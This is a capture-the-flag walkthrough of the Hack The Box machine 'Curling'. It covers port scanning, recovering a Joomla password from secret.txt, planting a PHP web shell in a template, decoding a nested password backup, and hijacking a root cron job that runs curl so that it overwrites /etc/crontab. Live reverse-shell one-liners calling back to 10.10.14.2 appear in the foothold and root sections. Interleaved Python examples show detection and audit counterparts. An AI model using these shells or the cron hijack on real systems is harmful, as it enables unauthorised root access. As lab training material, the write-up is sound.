
Hack The Box - Curling


SYNOPSIS

Curling is an easy-difficulty Linux machine that requires a lot of enumeration. A password is stored in a file in the web root. The username can be enumerated from posts on the CMS, which then permits login. Modifying a PHP template yields a reverse shell. Finding a hex dump and unpacking it provides a user password. Enumerating the running processes reveals a cron job that can be used to obtain root.

Skills Required

Enumeration

Skills Learned

Analyzing hex dump
Curl usage


Enumeration

Port Scan

$ masscan -p1-65535 --rate=1000 -e tun0 $target
Discovered open port 22/tcp on 10.129.105.207                                  
Discovered open port 80/tcp on 10.129.105.207 

$ nmap -sC -sV -p22,80 -v $target
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap script

$ nmap -p 80 --script safe $target -v $target
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-10 12:21 BST
NSE: Loaded 346 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:21
NSE: [mtrace] not running for lack of privileges.
NSE: [broadcast-pppoe-discover] not running for lack of privileges.
NSE: [broadcast-ataoe-discover] No interface supplied, use -e
NSE: [url-snarf] not running for lack of privileges.
NSE: [broadcast-eigrp-discovery] not running for lack of privileges.
NSE: [broadcast-igmp-discovery] not running due to lack of privileges.
NSE: [broadcast-pim-discovery] not running for lack of privileges.
NSE: [shodan-api] Error: Please specify your ShodanAPI key with the shodan-api.apikey argument
NSE: [mrinfo] not running for lack of privileges.
NSE: [llmnr-resolve] not running due to lack of privileges.
NSE: [knx-gateway-discover] Not running due to lack of privileges.
NSE: not running for lack of privileges.
NSE: [broadcast-dhcp6-discover] not running for lack of privileges.
NSE: [lltd-discovery] not running for lack of privileges.
NSE: [broadcast-sonicwall-discover] Not running for lack of privileges.
NSE: [broadcast-dhcp-discover] not running for lack of privileges.
NSE: [targets-xml] Need to supply a file name with the targets-xml.iX argument
NSE: [broadcast-ping] not running for lack of privileges.
NSE: [broadcast-listener] not running for lack of privileges.
Completed NSE at 12:22, 40.02s elapsed
Initiating NSE at 12:22
Completed NSE at 12:22, 0.00s elapsed
Pre-scan script results:
|_broadcast-wpad-discover: Failed to retrieve wpad.dat (http://wpad.com/wpad.dat) from server
| targets-asn: 
|_  targets-asn.asn is a mandatory parameter
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
Initiating Ping Scan at 12:22
Scanning 2 hosts [2 ports/host]
Completed Ping Scan at 12:22, 0.02s elapsed (2 total hosts)
Initiating Parallel DNS resolution of 2 hosts. at 12:22
Completed Parallel DNS resolution of 2 hosts. at 12:22, 0.01s elapsed
Initiating Connect Scan at 12:22
Scanning 2 hosts [1 port/host]
Discovered open port 80/tcp on 10.129.105.207
Discovered open port 80/tcp on 10.129.105.207
Completed Connect Scan at 12:22, 0.00s elapsed (2 total ports)
NSE: Script scanning 2 hosts.
Initiating NSE at 12:22
NSE: [path-mtu] not running for lack of privileges.
NSE: [ipidseq] not running for lack of privileges.
NSE: [firewalk] not running for lack of privileges.
NSE: [qscan] not running for lack of privileges.
NSE: [tls-ticketbleed] Not running due to lack of privileges.
Completed NSE at 12:22, 22.59s elapsed
Initiating NSE at 12:22
Completed NSE at 12:22, 0.00s elapsed
Nmap scan report for 10.129.105.207
Host is up (0.015s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-backup-finder: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.105.207
|   http://10.129.105.207:80/index.php/2-uncategorised/index.bak
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling~
|   http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/3-what-s-the-object-of-curling
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/3-what-s-the-object-of-curling
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/3-what-s-the-object-of-curling
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.1
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.~1~
|   http://10.129.105.207:80/index.php/2-uncategorised/index.bak
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018~
|   http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/1-first-post-of-curling2018
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/1-first-post-of-curling2018
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/1-first-post-of-curling2018
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.1
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.~1~
|   http://10.129.105.207:80/index.php/2-uncategorised/index.bak
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018~
|   http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/1-first-post-of-curling2018
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/1-first-post-of-curling2018
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/1-first-post-of-curling2018
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.1
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/1-first-post-of-curling2018.~1~
|   http://10.129.105.207:80/index.php/2-uncategorised/index.bak
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true~
|   http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/2-curling-you-know-its-true
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/2-curling-you-know-its-true
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/2-curling-you-know-its-true
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.1
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.~1~
|   http://10.129.105.207:80/index.php/2-uncategorised/index.bak
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true~
|   http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/2-curling-you-know-its-true
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/2-curling-you-know-its-true
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/2-curling-you-know-its-true
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.1
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/2-curling-you-know-its-true.~1~
|   http://10.129.105.207:80/index.php/2-uncategorised/index.bak
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling~
|   http://10.129.105.207:80/index.php/2-uncategorised/index copy.php/2-uncategorised/3-what-s-the-object-of-curling
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy of index.php/2-uncategorised/3-what-s-the-object-of-curling
|   http://10.129.105.207:80/index.php/2-uncategorised/Copy (2) of index.php/2-uncategorised/3-what-s-the-object-of-curling
|   http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.1
|_  http://10.129.105.207:80/index.php/2-uncategorised/index.php/2-uncategorised/3-what-s-the-object-of-curling.~1~
|_http-fetch: Please enter the complete path of the directory to save data in.
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
|_http-xssed: No previously reported XSS vuln.
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 250
| http-traceroute: 
|_  Possible reverse proxy detected.
|_http-referer-checker: Couldn't find any cross-domain scripts.
| http-grep: 
|   (1) http://10.129.105.207:80/: 
|     (1) ip: 
|_      + 10.129.105.207
| http-headers: 
|   Date: Mon, 10 Oct 2022 11:22:19 GMT
|   Server: Apache/2.4.29 (Ubuntu)
|   Set-Cookie: c0548020854924e0aecd05ed9f5b672b=hc0lipau9p6ra5ne1u0i75f8r8; path=/; HttpOnly
|   Expires: Wed, 17 Aug 2005 00:00:00 GMT
|   Last-Modified: Mon, 10 Oct 2022 11:22:19 GMT
|   Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|   Pragma: no-cache
|   Connection: close
|   Content-Type: text/html; charset=utf-8
|   
|_  (Request type: HEAD)
|_http-mobileversion-checker: No mobile version detected.
| http-auth-finder: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.105.207
|   url                                                                                method
|   http://10.129.105.207:80/                                                          FORM
|   http://10.129.105.207:80/index.php/component/users/?view=reset&Itemid=101      FORM
|   http://10.129.105.207:80/index.php/2-uncategorised/1-first-post-of-curling2018     FORM
|   http://10.129.105.207:80/index.php                                                 FORM
|   http://10.129.105.207:80/index.php/2-uncategorised/2-curling-you-know-its-true     FORM
|   http://10.129.105.207:80/index.php/component/users/?view=remind&Itemid=101     FORM
|_  http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling  FORM
|_http-title: Home
| http-comments-displayer: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.105.207
|     
|     Path: http://10.129.105.207:80/media/jui/js/bootstrap.min.js?b6bf078482bc6a711b54fa9e74e19603
|     Line number: 1
|     Comment: 
|         /*!
|          * Bootstrap.js by @fat & @mdo
|          * Copyright 2012 Twitter, Inc.
|          * http://www.apache.org/licenses/LICENSE-2.0.txt
|          *
|          * Custom version for Joomla!
|          */
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 213
|     Comment: 
|         <!-- End Right Sidebar -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 161
|     Comment: 
|         <!-- Begin Right Sidebar -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 42
|     Comment: 
|         <!-- Header -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 39
|     Comment: 
|         <!-- Body -->
|     
|     Path: http://10.129.105.207:80/templates/protostar/js/template.js?b6bf078482bc6a711b54fa9e74e19603
|     Line number: 1
|     Comment: 
|         /**
|          * @package     Joomla.Site
|          * @subpackage  Templates.protostar
|          * @copyright   Copyright (C) 2005 - 2018 Open Source Matters, Inc. All rights reserved.
|          * @license     GNU General Public License version 2 or later; see LICENSE.txt
|          * @since       3.2
|          */
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 27
|     Comment: 
|         <!--[if lt IE 9]><script src="/media/jui/js/html5.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
|     
|     Path: http://10.129.105.207:80/media/jui/js/html5.js?b6bf078482bc6a711b54fa9e74e19603
|     Line number: 1
|     Comment: 
|         /**
|         * @preserve HTML5 Shiv 3.7.3 | @afarkas @jdalton @jon_neal @rem | MIT/GPL2 Licensed
|         */
|     
|     Path: http://10.129.105.207:80/index.php?format=feed&amp;type=rss
|     Line number: 2
|     Comment: 
|         <!-- generator="Joomla! - Open Source Content Management" -->
|     
|     Path: http://10.129.105.207:80/media/system/js/caption.js?b6bf078482bc6a711b54fa9e74e19603
|     Line number: 1
|     Comment: 
|         /*
|                 GNU General Public License version 2 or later; see LICENSE.txt
|         */
|     
|     Path: http://10.129.105.207:80/index.php/component/users/?view=remind&amp;Itemid=101
|     Line number: 29
|     Comment: 
|         <!--[if lt IE 9]><script src="/media/system/js/html5fallback.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 233
|     Comment: 
|         <!-- secret.txt -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 218
|     Comment: 
|         <!-- Footer -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 55
|     Comment: 
|         <!-- Begin Content -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 158
|     Comment: 
|         <!-- End Content -->
|     
|     Path: http://10.129.105.207:80/index.php/2-uncategorised/3-what-s-the-object-of-curling
|     Line number: 29
|     Comment: 
|_        <!--[if lt IE 9]><script src="/media/system/js/polyfill.event.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
| http-security-headers: 
|   Cache_Control: 
|     Header: Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|   Pragma: 
|     Header: Pragma: no-cache
|   Expires: 
|_    Header: Expires: Wed, 17 Aug 2005 00:00:00 GMT
|_http-date: Mon, 10 Oct 2022 11:22:18 GMT; +1h00m01s from local time.
|_http-malware-host: Host appears to be clean
| http-useragent-tester: 
|   Status for browser useragent: 200
|   Allowed User Agents: 
|     Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
|     libwww
|     lwp-trivial
|     libcurl-agent/1.0
|     PHP/
|     Python-urllib/2.5
|     GT::WWW
|     Snoopy
|     MFC_Tear_Sample
|     HTTP::Lite
|     PHPCrawl
|     URI::Fetch
|     Zend_Http_Client
|     http client
|     PECL::HTTP
|     Wget/1.13.4 (linux-gnu)
|_    WWW-Mechanize/1.34
|_http-generator: Joomla! - Open Source Content Management

Host script results:
| unusual-port: 
|_  WARNING: this script depends on Nmap's service/version detection (-sV)
| port-states: 
|   tcp: 
|_    open: 80
| dns-blacklist: 
|   SPAM
|     list.quorum.to - FAIL
|_    l2.apews.org - FAIL
|_clock-skew: 1h00m00s
|_fcrdns: FAIL (No PTR record)

NSE: Script Post-scanning.
Initiating NSE at 12:22
Completed NSE at 12:22, 0.00s elapsed
Initiating NSE at 12:22
Completed NSE at 12:22, 0.00s elapsed
Post-scan script results:
| reverse-index: 
|_  80/tcp: 10.129.105.207, 10.129.105.207
Read data files from: /usr/bin/../share/nmap
Nmap done: 2 IP addresses (2 hosts up) scanned in 63.92 seconds

$ searchsploit Apache 2.4.29
<SNIP>
Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)                                    | multiple/webapps/50383.sh

The HTML source of the home page contains a secret.txt comment; visit that file to view it

view-source:http://10.129.106.27/

![[Pasted image 20221012193728.png]]

$ curl -s http://$target/secret.txt | base64 -d
Curling2018!

Go to http://10.129.106.27/administrator and log in with the user Floris and the password Curling2018!


Foothold

Web

The curling website is hosted on Joomla CMS: the posts are written by Super User, and one of them is signed Floris. The home page HTML source contains a comment:

<SNIP>
</body>
    <!-- secret.txt -->
</html>

Visiting it returns a base64-encoded string; decoding it yields the password for the site back end:

$ echo 'Q3VybGluZzIwMTgh' | base64 -d
Curling2018!

Searching for Joomla CMS details shows that the admin panel path is /administrator; log in successfully as floris.

Getting a www-data shell

Find a place to write PHP code: go to Extensions -> Templates.

Create a new php file (or pick an existing one), write a PHP shell into it, and save.

<?php system($_REQUEST['pwn']); ?>

Request the page to test the shell (http://10.129.106.116/templates/beez3/dark.php?pwn=id), then obtain a reverse shell.

![[Curling_www-data.png]]

$ curl http://10.129.106.116/templates/beez3/dark.php -G --data-urlencode 'pwn=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1234 >/tmp/f '

$ rlwrap nc -lvp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.129.106.116.
Ncat: Connection from 10.129.106.116:42390.
/bin/sh: 0: can not access tty; job control turned off
whoami
www-data

$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@curling:/var/www/html/templates/beez3$ ll
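The detection-side counterpart to the template edit above, added here as an example (it is not part of the writeup and not Joomla's own tooling): a file-integrity check of the templates directory against a deploy-time hash manifest, with a signature scan of any new or changed PHP file. The two file contents, the paths and the manifest are constructed literals; a real deployment would read them from disk and from a manifest written at install time.

```python
import hashlib
import re

# Constructed fixture (not read from disk): a benign template file and a file
# carrying the one-liner shown above, keyed by path relative to the web root.
TEMPLATE_FILES = {
    "templates/beez3/index.php": "<?php defined('_JEXEC') or die; echo $this->getHtml(); ?>",
    "templates/beez3/dark.php": "<?php system($_REQUEST['pwn']); ?>",
}


def sha256_text(src: str) -> str:
    return hashlib.sha256(src.encode()).hexdigest()


# Constructed baseline: the manifest taken at deploy time, when only index.php existed.
BASELINE = {"templates/beez3/index.php": sha256_text(TEMPLATE_FILES["templates/beez3/index.php"])}

# Patterns that are almost never legitimate inside a Joomla template file.
SUSPICIOUS = [
    (r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", "command execution"),
    (r"\beval\s*\(", "eval"),
    (r"\$_(REQUEST|GET|POST|COOKIE)\b", "request-controlled input"),
]


def scan_php(src: str) -> list:
    """Return the labels of every suspicious pattern found in one PHP source file."""
    return [label for pattern, label in SUSPICIOUS if re.search(pattern, src)]


def integrity_check(files: dict, baseline: dict):
    """Compare current files with the manifest; return (new paths, modified paths)."""
    new, modified = [], []
    for path, src in files.items():
        if path not in baseline:
            new.append(path)
        elif baseline[path] != sha256_text(src):
            modified.append(path)
    return new, modified


def report(files: dict, baseline: dict) -> dict:
    """Map each new or modified file to the suspicious patterns it contains."""
    new, modified = integrity_check(files, baseline)
    return {path: scan_php(files[path]) for path in new + modified}


if __name__ == "__main__":
    for path, hits in report(TEMPLATE_FILES, BASELINE).items():
        print(path, hits)
```

The integrity check is the part that matters: a template editor that lets an administrator write arbitrary PHP cannot be signature-scanned reliably, but any file under templates/ that differs from the deploy-time manifest is worth an alert regardless of its contents.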


LATERAL MOVEMENT

HEX DUMP

Navigating to the /home/floris directory, we find password_backup

$ cat password_backup
00000000: 425a 6839 3141 5926 5359 819b bb48 0000  BZh91AY&SY...H..
00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34  ....A...P)ava.:4
<SNIP>

$ cp password_backup /tmp && cat /tmp/password_backup | xxd -r > /tmp/bak

$ file bak
bak: bzip2 compressed data, block size = 900k

The file has been compressed several times; decompress it as follows:

$ bzip2 -d bak
bzip2: Can not guess original name for bak -- using bak.out
$ file bak.out
bak.out: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix

$ mv bak.out bak.gz

$ gzip -d bak.gz

$ file bak
bak: bzip2 compressed data, block size = 900k

$ bzip2 -d bak
bzip2: Can not guess original name for bak -- using bak.out

$ file bak.out
bak.out: POSIX tar archive (GNU)

$ tar xf bak.out

$ cat password.txt
5d<wdCbdZu)|hChXll    # floris's SSH password
$ ssh floris@10.129.106.116
Last login: Wed Sep  8 11:42:07 2021 from 10.10.14.15
floris@curling:~$ whoami
floris
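The unpacking sequence above (xxd -r, then bzip2, gzip, bzip2 and tar, each identified by `file`) can be automated by checking magic bytes at every step. The following is an added example, not code from the writeup: it builds an in-memory sample with the same tar -> bzip2 -> gzip -> bzip2 nesting, renders it in xxd's layout, then reverses the dump and peels the layers. The secret inside the sample is a constructed placeholder, not the password from the box; the loop bound and the size limit are assumptions chosen here so that a crafted dump cannot inflate without limit.

```python
import bz2
import gzip
import io
import tarfile

# Constructed sample secret: NOT the contents of the box's password.txt.
SAMPLE_SECRET = b"constructed-sample-password\n"
MAX_LAYER_BYTES = 16 * 1024 * 1024  # assumption: refuse to inflate past this (bomb guard)


def to_xxd(data: bytes) -> str:
    """Render bytes in xxd's default layout: offset, 8 groups of 2 bytes, ASCII column."""
    lines = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        groups = [chunk[i:i + 2].hex() for i in range(0, len(chunk), 2)]
        hexcol = " ".join(groups).ljust(39)  # 8 groups * 4 hex chars + 7 separators
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {hexcol}  {text}")
    return "\n".join(lines) + "\n"


def from_xxd(dump: str) -> bytes:
    """Reverse an xxd dump the way `xxd -r` does, ignoring the ASCII column."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue
        # hex groups are separated by one space; two spaces start the ASCII column
        hex_part = line.split(":", 1)[1].strip().split("  ", 1)[0]
        out += bytes.fromhex(hex_part.replace(" ", ""))
    return bytes(out)


def peel(blob: bytes, member: str = "password.txt"):
    """Identify each layer by its magic bytes and unwrap until a tar archive (or unknown data)."""
    layers = []
    data = blob
    for _ in range(10):  # bounded: a crafted file cannot keep us looping
        if data[:3] == b"BZh":
            layers.append("bzip2")
            data = bz2.decompress(data)
        elif data[:2] == b"\x1f\x8b":
            layers.append("gzip")
            data = gzip.decompress(data)
        elif len(data) >= 262 and data[257:262] == b"ustar":
            layers.append("tar")
            with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tf:
                return layers, tf.extractfile(member).read()
        else:
            return layers, data
        if len(data) > MAX_LAYER_BYTES:
            raise ValueError("layer inflated past the size limit")
    raise ValueError("too many nested layers")


def build_sample_dump() -> str:
    """Build tar -> bzip2 -> gzip -> bzip2 (the nesting seen on the box) and dump it like xxd."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo("password.txt")
        info.size = len(SAMPLE_SECRET)
        tf.addfile(info, io.BytesIO(SAMPLE_SECRET))
    blob = bz2.compress(gzip.compress(bz2.compress(buf.getvalue())))
    return to_xxd(blob)


def demo():
    """Round trip: dump text -> bytes -> list of layers and the recovered tar member."""
    return peel(from_xxd(build_sample_dump()))


if __name__ == "__main__":
    layers, secret = demo()
    print(" -> ".join(layers), secret.decode().strip())
```

Running it prints the layer order followed by the recovered sample text. The same `peel` works on the real dump once it has been passed through `from_xxd`, because each step is decided by the data's own magic bytes rather than by file names or extensions.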

Privilege Escalation

Enumeration

Use the pspy tool: download the smaller binary and transfer it to the box

$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.0.0/pspy64s

$ scp pspy64s floris@10.129.106.116:/tmp
$ cd /tmp
$ chmod +x pspy64s
$ ./pspy64s
/bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report 
2022/10/14 10:50:01 CMD: UID=0    PID=2664   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input 
2022/10/14 10:50:01 CMD: UID=0    PID=2663   | /usr/sbin/CRON -f 
2022/10/14 10:50:01 CMD: UID=0    PID=2662   | /usr/sbin/CRON -f 
2022/10/14 10:50:01 CMD: UID=0    PID=2667   | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report

A cron job is found running. curl's -K option specifies a config file: the cron job uses input as the config and writes the output to report.

$ cat /home/floris/admin-area/input 
url = "http://127.0.0.1"

$ ls -la /home/floris/admin-area/input 
-rw-rw---- 1 root floris 25 Oct 14 11:00 /home/floris/admin-area/input


The input file is owned by the group we are in, so we can write our own config, and the output option can specify the output file. Create a malicious crontab and overwrite input.
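What makes this cron job dangerous is the combination of three facts visible above: the config is fed to curl by root, a curl config may carry an `output` path, and the config file is group-writable by a non-root group. The audit below is an added example (not from the writeup and not a curl feature): it pulls the -K path out of a cron command line, parses curl's config-file syntax, and flags configs whose `url` is not loopback or whose `output` escapes an allowed directory, plus config files that a non-root user or group can modify. The cron command, both config texts and the allowed directory are constructed samples modelled on what the page shows; the mode bits 0o660 root:floris mirror the `ls -la` output.

```python
import posixpath
import re
import shlex
import stat
from urllib.parse import urlparse

# Constructed samples modelled on the cron command and config file shown above.
SAMPLE_CRON_CMD = "curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report"
SAMPLE_CONFIG_OK = 'url = "http://127.0.0.1"\n'
SAMPLE_CONFIG_BAD = '# attacker-controlled contents\nurl = "http://10.10.14.20/crontab"\noutput = "/etc/crontab"\n'
ALLOWED_OUTPUT_DIR = "/home/floris/admin-area"  # assumption: the only place the job may write

# curl accepts `option=value`, `option:value` or `option value`, with optional leading dashes
_OPT_RE = re.compile(r"^-{0,2}([\w-]+)\s*(?:[=:]|\s)\s*(.*)$")


def parse_curl_config(text: str) -> dict:
    """Parse curl's -K file format: one option per line, '#' comments, optional quoted value."""
    opts = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _OPT_RE.match(line)
        if not m:                      # bare flag such as `insecure`
            opts[line.lstrip("-")] = ""
            continue
        key, value = m.group(1), m.group(2).strip()
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        opts[key] = value
    return opts


def config_path_from_cron(cmd: str):
    """Return the -K / --config path in a cron command line, or None if there is none."""
    argv = shlex.split(cmd)
    for i, tok in enumerate(argv):
        if tok in ("-K", "--config") and i + 1 < len(argv):
            return argv[i + 1]
    return None


def audit_config(text: str, allowed_dir: str) -> list:
    """Findings for a config that a root cron job will hand to curl -K."""
    opts = parse_curl_config(text)
    findings = []
    host = urlparse(opts.get("url", "")).hostname
    if host not in (None, "127.0.0.1", "localhost", "::1"):
        findings.append(f"url fetches from non-loopback host {host}")
    if "output" in opts:
        target = posixpath.normpath(opts["output"])
        if not target.startswith(allowed_dir.rstrip("/") + "/"):
            findings.append(f"output writes outside {allowed_dir}: {target}")
    return findings


def audit_permissions(mode: int, owner: str, group: str) -> list:
    """Flag a config file that someone other than root is able to modify."""
    findings = []
    if owner != "root":
        findings.append(f"owned by non-root user {owner}")
    if mode & stat.S_IWGRP and group != "root":
        findings.append(f"group-writable by {group}")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings


def demo() -> dict:
    """Run the audit over the constructed samples."""
    return {
        "config_path": config_path_from_cron(SAMPLE_CRON_CMD),
        "ok": audit_config(SAMPLE_CONFIG_OK, ALLOWED_OUTPUT_DIR),
        "bad": audit_config(SAMPLE_CONFIG_BAD, ALLOWED_OUTPUT_DIR),
        "perms": audit_permissions(0o660, "root", "floris"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The permission finding is the one that matters for remediation: a root cron job must not read a config that anyone but root can write, so the fix is a root-owned file without group or world write bits (or running the job as an unprivileged user), not a filter on the config contents.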

Configuration steps

First, create the malicious crontab file on the local machine and start a simple HTTP server

$ cp /etc/crontab .
$ echo '* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1234 >/tmp/f ' >> crontab
$ python3 -m http.server 80

As the floris user, modify the contents of the input file so that url points to the malicious crontab file on the local machine

url = "http://10.10.14.20/crontab"
output = "/etc/crontab"

Start a listener, check the input file that will be fed to curl, and wait for the shell to connect back

$ nc -lvp 1234

$ cat input

Root access obtained successfully

$ nc -lvp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.129.106.157.
Ncat: Connection from 10.129.106.157:36182.
/bin/sh: 0: can not access tty; job control turned off
whoami
root